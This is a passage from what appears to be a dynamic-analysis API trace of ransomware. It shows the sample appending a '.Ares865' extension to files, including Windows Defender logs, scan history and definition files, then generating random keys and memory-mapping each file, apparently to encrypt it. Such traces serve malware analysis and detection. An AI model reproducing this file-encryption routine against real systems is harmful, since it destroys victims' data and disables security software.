wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov.Ares865") returned 88 [0083.775] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov.ares865"), dwFlags=0x1) returned 1 [0083.776] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.776] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10374) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.777] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.777] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.777] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.777] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b90, lpName=0x0) returned 0x15c [0083.779] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b90) returned 0x190000 [0083.780] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.781] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.781] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.781] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.781] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0083.782] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender" [0083.782] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" [0083.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.Ares865") returned 87 [0083.783] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.ares865"), dwFlags=0x1) returned 1 [0083.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=199386) returned 1 [0083.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.785] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.785] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.785] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.786] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x30de0, lpName=0x0) returned 0x15c [0083.787] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30de0) returned 0x420000 [0083.796] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.797] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.797] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.800] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0083.801] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0083.801] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0083.801] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0083.802] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.Ares865") returned 87 [0083.802] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\history.log"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\history.log.ares865"), dwFlags=0x1) returned 1 [0083.803] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\history.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.803] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2) returned 1 [0083.803] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.804] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.804] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.804] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.805] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0083.806] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0083.807] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.808] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.808] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.809] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.Ares865") returned 87 [0083.809] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\unknown.log"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.ares865"), dwFlags=0x1) returned 1 [0083.812] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\unknown.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6790) returned 1 [0083.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.812] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.813] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.813] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.813] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d90, lpName=0x0) returned 0x15c [0083.816] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d90) returned 0x190000 [0083.817] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.818] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.818] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.819] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0083.819] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0083.820] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned 123 [0083.820] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.ares865"), dwFlags=0x1) returned 1 [0083.820] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.821] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6752) returned 1 [0083.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.821] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.822] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.822] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.822] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d60, lpName=0x0) returned 0x15c [0083.824] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d60) returned 0x190000 [0083.825] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.825] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.825] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.826] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0083.827] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.Ares865") returned 90 [0083.827] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.ares865"), dwFlags=0x1) returned 1 [0083.827] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.828] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=211808) returned 1 [0083.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.828] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.829] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.829] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.829] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33e60, lpName=0x0) returned 0x15c [0083.830] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33e60) returned 0x420000 [0083.841] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.842] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.842] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0083.845] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0083.845] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0083.846] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0083.846] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0083.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.Ares865") returned 124 [0083.846] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.ares865"), dwFlags=0x1) returned 1 [0083.847] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasbase.vdm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11628944) returned 1 [0083.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.848] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.848] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.849] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb17490, lpName=0x0) returned 0x15c [0083.858] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xa00000, dwNumberOfBytesToMap=0x117490) returned 0x3030000 [0084.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.165] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.165] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.Ares865") returned 124 [0084.184] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.ares865"), dwFlags=0x1) returned 1 [0084.186] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=339344) returned 1 [0084.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.187] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.191] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.191] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.192] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x53090, lpName=0x0) returned 0x15c [0084.194] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53090) returned 0x420000 [0084.211] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.212] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.212] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.217] 